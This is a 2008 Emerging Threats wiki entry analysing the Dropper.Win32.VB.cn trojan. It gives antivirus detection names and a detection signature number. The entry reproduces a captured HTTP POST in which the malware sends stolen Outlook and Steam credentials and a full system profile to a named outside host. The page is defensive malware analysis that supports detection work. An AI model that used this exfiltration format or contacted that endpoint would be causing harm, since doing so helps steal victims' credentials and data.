EmergingThreats> Main Web>MalwareDocs>DropperWin32VBcn (2008-07-11, MattJonkman) EditAttach

Dropper.Win32.VB.cn

Applies to other similar droppers, but this is the one we saw first posting like this.

Sig 2007987 should cover it. 

Virustotal   Result
AntiVir    TR/Drop.VB.ON.31
Avast    Win32:Agent-FLY
AVG    Dropper.Generic.TTR
ClamAV    PUA.Packed.Themida
F-Prot    W32/Heuristic-162!Eldorado
F-Secure    SDBot.gen8
Fortinet    W32/VB.ON!tr
Ikarus    Virus.Win32.Agent.FLY
Kaspersky    Trojan-Dropper.Win32.VB.on
Norman    SDBot.gen8
Prevx1    Heuristic:Suspicious Code
Sophos    Sus/ComPack
TheHacker    Trojan/Dropper.VB.on
VBA32    Trojan-Dropper.Win32.VB.on
Webwasher-Gateway    Trojan.Drop.VB.ON.31
Packer    Themida

Makes a post like so, slightly obfuscated: 

POST /admin/upper.php HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Accept-Language: en-us
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: tzine1993.tz.funpic.de
Content-Length: 2981
Connection: Keep-Alive
Cache-Control: no-cache

post===================================================
Resource Name       : IdentitiesPass 
Resource Type       : Outlook Express Identity 
User Name/Value     : Main Identity 
Password            : 
==================================================

*************************************************************** 
*************************************************************** 
*************************************************************** 
************************STEAM PASSWORDS************************ 
Steam Account Reader
http://www.steampowered.com

*** ONLY FOR USE IF YOU'VE FORGOT _YOUR_ STEAM LOGIN ***

[-] Checking for valid files..

[x] Invalid Steam account files.
[x] Invalid Steam account files.
*************************************************************** 
*************************************************************** 
*************************************************************** 
************************INFO ABOUT PC************************** 

************************ PC-DRIVES: ***************************

C:      FIXED DISK DRIVE
D:      CD DRIVE
************************ OTHER PC INFORMATION: ***************************
WLNumDLLsProt=0


USERNAME: xxxx
USERDOMAIN: xxxx
PROCESSOR_IDENTIFIER: x86 Family 6 Model 3 Stepping 3, GenuineIntel
NUMBER_OF_PROCESSORS: 1
OS: Windows_NT


Number of procesor: 1
Processor: 586
Low memory address: 65536
High memory address: 2147418111



Number of mouse buttons: 5
Screen X: 800
Screen Y: 600
Height of windows caption: 26
Width between desktop icons: 75
Maximum width when resizing a window: 612
Is machine is too slow to run windows? 0


C:\Documents and Settings\All Users
C:\Documents and Settings\Default User
C:\Documents and Settings
C:\Documents and Settings\xxxx


ComputerName: xxxx


Windows System directory: C:\WINDOWS\system32


AC power status: OnLine
Battery charge status: No system battery


UserName: xxxx
Temp Path: C:\DOCUME~1\bob1\LOCALS~1\Temp\


OS: Windows NT 
Win version: 5.1
Build:  2600


Start menu folder: C:\Documents and Settings\xxxx\Start Menu
Favorites folder: C:\Documents and Settings\xxxx\Favorites
Programs folder: C:\Documents and Settings\xxxx\Start Menu\Programs
Desktop folder: C:\Documents and Settings\xxxx\Desktop


             SYSTEMZEIT:             

The System Date is:3-11-2008
The System Time is:22:51:35


             LOKALZEIT:             

The Local Date is:3-11-2008
The Local Time is:18:51:35


2   IP addresses found on PC !!
----------------------------------------
IP address                   : 192.168.xx.xx
IP Subnetmask            : 255.255.255.0
BroadCast IP address  : 1.0.0.0
**************************************
IP address                   : 127.0.0.1
IP Subnetmask            : 255.0.0.0
BroadCast IP address  : 1.0.0.0
**************************************



Pfad von wo aus die server.exe gestartet wurde: c:\
HTTP/1.1 200 OK
Date: Tue, 11 Mar 2008 17:57:19 GMT
Server: Apache
Content-Length: 0
Keep-Alive: timeout=10, max=1000
Connection: Keep-Alive
Content-Type: text/html; charset=ISO-8859-1

Re: 8116f2e3b33c462c18168fb44ca32a97

-- MattJonkman - 12 Mar 2008

Edit | Attach | Print version | History: r2 < r1 | Backlinks | Raw View | WYSIWYG | More topic actions
Topic revision: r2 - 2008-07-11 - MattJonkman
 
This site is powered by the TWiki collaboration platform Powered by Perl This site is powered by the TWiki collaboration platformCopyright © Emerging Threats